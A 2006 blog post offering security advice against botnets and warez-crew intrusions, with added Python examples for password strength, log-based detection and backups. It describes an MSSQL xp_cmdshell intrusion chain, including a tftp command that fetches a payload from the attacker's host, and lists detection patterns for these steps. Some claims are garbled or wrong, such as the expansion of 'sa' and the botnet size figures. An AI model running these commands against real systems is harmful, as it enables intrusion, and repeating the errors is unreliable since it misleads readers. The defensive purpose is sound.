Saturday, January 21, 2006

Require Complex Passwords


This paper was written because of the massive attacks against servers and the construction of huge botnets! It is not a practical guidebook to any operating system or to perfect security on any computer.

If you are an administrator or any computer owner, you do NOT need to be a security expert to get at least some security on your home computers or big cluster systems! There are 5 easy-to-follow steps that will help prevent you from getting hacked or becoming one of those remote-controlled computers!

First off, I am going to tell you a little bit about the fascinating world of botnets and other very unlikely things that can happen to your computers:

-) Getting hacked:
If you watch some internet forums you will very likely see those postings "i got hacked" or "my box got hacked, what do i do now?", but did they really get hacked? ...Well, as far as I know only 3 out of 10 boxes really got hacked; the other ones are just infected with the real bad stuff. The main reasons for hacking have changed, and in the real world there are not many real hackers left! The real ones are living in the world of the byte and the electron, looking out for the perfect code and all the knowledge they can gain! Most of the computers that are hacked today... well, they are NOT, they simply got cracked. But why are people breaking into systems? There are a couple of answers to this question, but only one that is for real. Servers most often get cracked by a so-called "haxxor", which stands for a kiddy cracker (in short: script kiddies). These just hack their way into boxes for two reasons:
-1) To just be "The ELITE HACKER" that can hack into his best friend's box, or
-2) because they are part of a so-called "Warez Crew".
If the box is hacked for a warez crew it may be running a trojan or some sort of bot, but definitely an FTP daemon! These hacked boxes are so-called "Stro" or "Stroz", which stands for a hacked box that is running an FTP daemon (most used are: Serv-U, Gene6, and some use glftpd ports for Windows). After these boxes are hacked and running some FTP daemon, the hacker is very likely to secure the bug that allowed him to hack the box! Afterwards the attacker submits an account on the FTP daemon to a so-called "Fillor" that fills the box with warez in hidden directories. This can cause massive amounts of traffic on hacked machines (up to some terabytes on 100 Mbit+ servers), because then the complete crew shares the accounts that have download-only rights!

Bots, botnets and other nasty stuff:
Well, this is what will happen most often: some cracker writes a worm to spread his bots, or if he is skilled enough he adds a scan engine to the bot. Bots, viruses and worms spread in nearly the same way script kiddies hack boxes to store their warez. If a new public exploit is released, or if the cracker finds a bug that he is able to use, he just takes that code and writes a scan engine for it. What that means is quite simple: every computer has an IP address and a number of ports (80 HTTP, 21 FTP, ...telnet...tftp...) and most services on a computer use a default port. The engine simply connects to that port and checks if it is open. If it is, the engine checks if the service is running (I am now taking 1433, known as MS-SQL, as my example). This is the point where it gets tricky: most bugs that allow executing code do not involve any passwords, but it can happen that the service does, as MSSQL does :-) If the service is able to use a password, SET IT and CHANGE THE USERNAME, because this makes it harder to guess the password by brute force (trying random combinations) or a dictionary attack (the attacker uses a word list with fixed-up password combinations). If the password is guessed you are very close to being (filtered)! In a warez crew a scan could look like this (with standard MSSQL):
Found: [sa: ] on 127.0.0.1
Now this tells the hacker or the bot that the computer with the IP address 127.0.0.1 (also known as localhost) has the username sa set, which stands for the SQL standard user (sa = Set Administrator). In this case the bot or haxxor connects to the target on port 1433 (MSSQL) and enters the username without a password. In regular cases it or he would only be able to change the password or add some data to the database, but this is for real and I am going to tell ya how it really works, since you need to know your enemy. The attacker uses an exploit that allows him to do certain procedure calls or to execute code (in the case of MSSQL it is a call). If a kiddy would hack SQL, the standard method of doing so is to call the procedure XP_CMDSHELL. This is a built-in feature of MSSQL that allows getting shell access (full access to CMD, also known as MS-DOS). Now he just uploads his stuff through the usage of ftp.exe (by the usage of a script) or by tftp (tftp.exe -i $ip get file), but there are other interesting ways to upload programs onto boxes (rcp, debug.exe, inline transfer, iexplore). After the FTP daemon or bot has been uploaded it just adds itself to the service list (see it through net start in cmd); this is done by c:/file/bad.exe -i, then the attacker starts the program by "net start servicename" and the bot or FTP daemon is running. In both cases the attacker or the bot will secure the security hole it used to get into the system! (In SQL you should delete the following DLLs: xpstar.dll, odsole70.dll, xpsql60.dll, xpsql70.dll, xplog70.dll, to create a so-called SQL error. This error only affects the exploit, not your database.)
Most kiddies cannot hack these boxes anymore, but some skilled ones or the real hacker can... You see, security is just an illusion! There are thousands of bugs like the one in SQL, too many to tell ya now, but if you stick to the following information it will help you to prevent getting hacked or becoming a bot.
So-called bots, if they are running on your system, will connect to IRC, to any server, and join a channel where they get their commands (IP ranges that need to be scanned and targets for DDoS attacks). A botnet that can do a successful DDoS needs to have a minimum of 5 fast boxes or 100000000000 slower ones!

After you have read the information about these little pests and kiddies, I am going to help ya a little bit with your security!
First off: the 5 basics:
-1) Require Complex Passwords
-2) Firewall and Antivirus
-3) Updates & User rights
-4) Access logging tools, Brute Force Detection tools
-5) Backups

I am going to take you step by step and tell ya what it is all about, so read this carefully.
1.) By using randomly generated passwords you may not be able to remember them as easily as you used to, but it will prevent you from getting hacked through password guessing or dictionary attacks! Still, you will need to have a different password for every account and service, because if one of them gets guessed the attacker would automatically have all of your passwords!
!!!!!DO NEVER SHARE OR TELL ANY OF YOUR PASSWORDS!!!!!!
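As an added example (not part of the original post), here is Python that does what step 1 asks for: it generates passwords from the operating system's random source, estimates how many brute-force guesses they would cost, and rejects the dictionary-style passwords (including the short "sa" from the scan output above) that a word-list attack gets first. The word list, the leet-speak table and the 60-bit threshold are constructed assumptions for this example, not values from the post.

```python
import math
import secrets
import string

# Character classes a generated password draws from (constructed choice for this example).
ALPHABET = string.ascii_letters + string.digits + string.punctuation

# Tiny constructed word list standing in for an attacker's dictionary;
# a real list has millions of entries, so treat a hit here as a sure loss.
SAMPLE_WORDLIST = {"password", "letmein", "qwerty", "admin", "sa", "welcome", "123456"}

# Leet-speak substitutions a dictionary attack tries anyway, so we undo them first.
LEET_TABLE = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s",
                            "@": "a", "$": "s", "!": "i"})


def generate_password(length: int = 16) -> str:
    """Return a random password using the OS CSPRNG (secrets), never random.random."""
    if length < 12:
        raise ValueError("use at least 12 characters")
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def charset_size(password: str) -> int:
    """Size of the smallest standard character set that covers every character."""
    size = 0
    if any(c.islower() for c in password):
        size += 26
    if any(c.isupper() for c in password):
        size += 26
    if any(c.isdigit() for c in password):
        size += 10
    if any(c in string.punctuation for c in password):
        size += len(string.punctuation)  # 32 symbols
    return size


def entropy_bits(password: str) -> float:
    """Upper bound on brute-force work: log2(charset ** length)."""
    size = charset_size(password)
    return len(password) * math.log2(size) if size else 0.0


def normalize(password: str) -> str:
    """Strip the year/number suffix and leet tricks: 'Pa55word2006' -> 'password'."""
    core = password.lower().rstrip(string.digits)
    return core.translate(LEET_TABLE)


def is_weak(password: str, wordlist=SAMPLE_WORDLIST, min_bits: float = 60.0) -> bool:
    """Weak if it is a (disguised) dictionary word or too short to resist brute force."""
    if normalize(password) in wordlist:
        return True
    return entropy_bits(password) < min_bits


def guess_time_seconds(password: str, guesses_per_second: float = 1e9) -> float:
    """Expected seconds to search half the keyspace at the given guess rate (assumed 1e9/s)."""
    return 2 ** (entropy_bits(password) - 1) / guesses_per_second


if __name__ == "__main__":
    for candidate in ("sa", "password1", "Pa55word2006", generate_password(16)):
        print(f"{candidate!r:22} bits={entropy_bits(candidate):5.1f} "
              f"weak={is_weak(candidate)} guess_time={guess_time_seconds(candidate):.3g}s")
```

The entropy figure is an upper bound: it assumes the attacker has to try the whole character set, which is exactly what a randomly generated password forces and a human-chosen one does not. That is why the dictionary check runs first and wins over the bit count.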
2.) Please make sure to install at least a good firewall and only ONE antivirus that you keep updated! If you are running multiple antivirus programs they will be scanning each other, slowing your system down and eating up memory until your box dies, but you will need to keep them updated!
3.) A point that most people do not think about, but that I really want to get your attention to, is the one with the USER RIGHTS! OK, I know it's hard to set them on XP boxes, but if you are logged in with an administrator account the attacker will have these rights automatically, whereas if you only have small, perfectly fitting user rights the attacker will have a much harder time trying to get your computer hacked. If there are any updates or patches, please use them, but do not let them be done automatically! Do them by HAND. Another very important point of security is to install only services that are needed and to uninstall the ones that are not needed (if there are only a few services, there are only a few bugs possible). For example nearly everybody has NetBIOS and $shares installed, but nobody knows what they do and nearly nobody uses them except for attackers!
4.) Access logging tools and network sniffers are not tools to prevent you from getting hacked, but to help you find out who hacked you and what he did; this is important to server administrators! Another great way is the usage of so-called "Brute-Force-Detection-Systems" and attack detection tools!
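The following Python is an added example, not code from the original post, and covers both step 4 and the MSSQL attack chain described earlier: it reads a constructed login/command log (the line format is invented for this example, not a real Windows or SQL Server log format), flags a source that fails logins in a burst, and flags the traces that chain leaves behind (an xp_cmdshell call, a tftp.exe/ftp.exe pull, and a "net start" of a service that is not on a known baseline). The baseline service names, the threshold and the window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample log in a simplified "timestamp EVENT key=value ..." format.
SAMPLE_LOG = """\
2006-01-21 03:10:01 LOGIN_FAILED user=sa src=10.0.0.5
2006-01-21 03:10:02 LOGIN_FAILED user=sa src=10.0.0.5
2006-01-21 03:10:02 LOGIN_FAILED user=sa src=10.0.0.5
2006-01-21 03:10:03 LOGIN_FAILED user=sa src=10.0.0.5
2006-01-21 03:10:03 LOGIN_FAILED user=sa src=10.0.0.5
2006-01-21 03:10:04 LOGIN_OK user=sa src=10.0.0.5
2006-01-21 03:10:09 SQL_EXEC user=sa src=10.0.0.5 cmd="EXEC master..xp_cmdshell 'tftp.exe -i 10.0.0.5 get bad.exe'"
2006-01-21 03:10:30 PROCESS user=SYSTEM cmd="net start badsvc"
2006-01-21 08:00:00 LOGIN_FAILED user=bob src=10.0.0.9
2006-01-21 09:00:00 LOGIN_OK user=bob src=10.0.0.9
"""

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<event>\S+) (?P<rest>.*)$")
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')  # quoted values may contain spaces

# Indicators of the chain described above (hypothetical names, constructed patterns).
INDICATORS = [
    ("xp_cmdshell call", re.compile(r"xp_cmdshell", re.I)),
    ("tftp/ftp file pull", re.compile(r"\b(tftp\.exe\s+-i\b|ftp\.exe\s+-s)", re.I)),
]
# Constructed baseline; on a real box take it from a clean 'net start' listing.
KNOWN_SERVICES = {"spooler", "w32time"}


def parse_line(line: str):
    """Return a dict with ts/event plus key=value fields, or None for an unparsable line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    fields = {k: v.strip('"') for k, v in KV_RE.findall(m.group("rest"))}
    return {"ts": datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S"),
            "event": m.group("event"), **fields}


def failed_login_bursts(lines, threshold: int = 5, window_seconds: int = 60):
    """Sources with at least `threshold` LOGIN_FAILED events inside any sliding window.
    Returns {src: peak failures seen inside one window}."""
    recent = defaultdict(deque)  # src -> timestamps still inside the window
    flagged = {}
    for line in lines:
        ev = parse_line(line)
        if not ev or ev["event"] != "LOGIN_FAILED":
            continue
        q = recent[ev["src"]]
        q.append(ev["ts"])
        while (ev["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            flagged[ev["src"]] = max(flagged.get(ev["src"], 0), len(q))
    return flagged


def suspicious_commands(lines):
    """(timestamp, indicator name, command) for every command matching an indicator,
    plus any 'net start' of a service that is not on the known baseline."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        if not ev or "cmd" not in ev:
            continue
        for name, rx in INDICATORS:
            if rx.search(ev["cmd"]):
                hits.append((ev["ts"], name, ev["cmd"]))
        m = re.match(r"net\s+start\s+(\S+)", ev["cmd"], re.I)
        if m and m.group(1).lower() not in KNOWN_SERVICES:
            hits.append((ev["ts"], "net start of unknown service", ev["cmd"]))
    return hits


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("burst sources:", failed_login_bursts(lines))
    for ts, name, cmd in suspicious_commands(lines):
        print(ts, name, "->", cmd)
```

The burst detector is the "Brute-Force-Detection-System" part; the indicator pass is the "find out what he did" part, and in the sample it lines up the guessed sa login, the xp_cmdshell pull and the new service minute by minute, which is exactly the timeline you want before you rebuild the box.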
5.) Backups: Everybody should do backups of his local hard drives. To get this accomplished as easily as possible you should divide your hard drives into the following partitions: c:/ (Windows, 6 gigabyte), d:/ (programs, 15 gig) and finally e:/ (workspace... as big as possible). If you wanna be very good you should only back up your workspace partition! OK, this is strange, but I am going to tell ya why: because this partition does not contain any executables (exe files) it is very small, so you can get a backup mostly on some CDs and DVDs! To save even more space you can compress it using WinRAR before burning any backup CDs/DVDs! DO NOT store any backups on your hard drives, because the attacker could be able to infect them; this is why you SHALL NOT use any Windows services for doing backups! Use external applications and build a custom install disk for your Windows! This allows you to have all programs ready when you need to do a reinstallation, and your documents are on a separate backup disk!
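An added example for step 5 (mine, not the author's): Python that packs only a workspace directory into an archive with the standard library's zipfile (standing in for WinRAR), skips executable file types so nothing runnable rides along into the backup, and embeds a SHA-256 manifest so the burned copy can be checked for tampering later, which goes one step beyond the text. The skipped extensions and the demo files are constructed.

```python
import hashlib
import json
import os
import tempfile
import zipfile

# File types that have no business in a documents-only backup (constructed list).
SKIP_EXTENSIONS = (".exe", ".dll", ".com", ".scr", ".bat", ".cmd")
MANIFEST_NAME = "MANIFEST.json"


def sha256_file(path: str) -> str:
    """Stream a file through SHA-256 so large documents do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def backup_workspace(src_dir: str, archive_path: str, skip_extensions=SKIP_EXTENSIONS):
    """Zip src_dir into archive_path, skipping executables, and embed a hash manifest.
    Returns the sorted list of archived relative paths (without the manifest)."""
    manifest = {}
    with zipfile.ZipFile(archive_path, "w", compression=zipfile.ZIP_DEFLATED) as zf:
        for root, _dirs, files in os.walk(src_dir):
            for name in files:
                if name.lower().endswith(skip_extensions):
                    continue  # the workspace should hold documents, never programs
                full = os.path.join(root, name)
                rel = os.path.relpath(full, src_dir).replace(os.sep, "/")
                manifest[rel] = sha256_file(full)
                zf.write(full, rel)
        zf.writestr(MANIFEST_NAME, json.dumps(manifest, sort_keys=True))
    return sorted(manifest)


def verify_backup(archive_path: str) -> bool:
    """Re-hash every member against the embedded manifest. True only if every file
    matches and nothing is missing or extra; a swapped or added file fails the check."""
    with zipfile.ZipFile(archive_path) as zf:
        manifest = json.loads(zf.read(MANIFEST_NAME))
        members = {n for n in zf.namelist() if n != MANIFEST_NAME}
        if members != set(manifest):
            return False
        for rel, digest in manifest.items():
            if hashlib.sha256(zf.read(rel)).hexdigest() != digest:
                return False
    return True


def demo_backup():
    """Build a constructed workspace in a temp dir, back it up and verify it.
    Returns (archived paths, verification result)."""
    base = tempfile.mkdtemp()
    ws = os.path.join(base, "workspace")
    os.makedirs(os.path.join(ws, "letters"))
    with open(os.path.join(ws, "notes.txt"), "w") as f:
        f.write("keep me\n")
    with open(os.path.join(ws, "letters", "cv.doc"), "w") as f:
        f.write("keep me too\n")
    with open(os.path.join(ws, "setup.exe"), "wb") as f:
        f.write(b"MZ not a document")  # must be left out of the backup
    archive = os.path.join(base, "workspace-backup.zip")
    entries = backup_workspace(ws, archive)
    return entries, verify_backup(archive)


if __name__ == "__main__":
    entries, ok = demo_backup()
    print("archived:", entries, "verified:", ok)
```

Keep the manifest's hashes (or the whole archive's hash) written on the disc sleeve or somewhere off the machine; if the box is compromised, the verification only proves something when the reference value was not sitting on the same infected drive.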

These are just a few easy steps to secure any system, and a little cute white paper for ya!
I really hope you enjoy it.

Greets

N@xXaTo3

Things to know
I wanted to add this section 'coz this paper might lead to some "misunderstandings":
a) I don't care that much about hacking SQL, but I thought it might be a good example to take for demonstration purposes!
b) Even if a system is secured and it's running MSSQL it can be hacked by usage of other vulnerabilities, for example if the DLLs are re-uploaded by the usage of net shares.
c) "Never change a running system!" ...is good, but there is one exception: updates!
d) This is not a tutorial to hack, but it can be seen as a white paper that shows some of the worst things that can happen to your computers.
e) If you think your COMPUTER might be hacked then you should use system information tools, including HijackThis and all the other great ones available from the net, to create a "REPORT" that includes as many details as possible so that your friends and helpers can find the problem quicker without asking too many questions!
f) Why did I post it at GSO? Well, since I see hacked computers every day and I am really getting annoyed. In my free time I am taking botnets from schools and even HOSPITALS down, and after I get the little pests off I will patch them if they cannot be reset! By now it really pisses me off that everybody needs to have a botnet to be that "cool"! You will see many posts in the future in sections like "discovered malware" and stuff, 'coz I find almost a new XDCC botkit every day! That is something that will have to change.

But how do they say? -------ONLY TIME CAN TELL
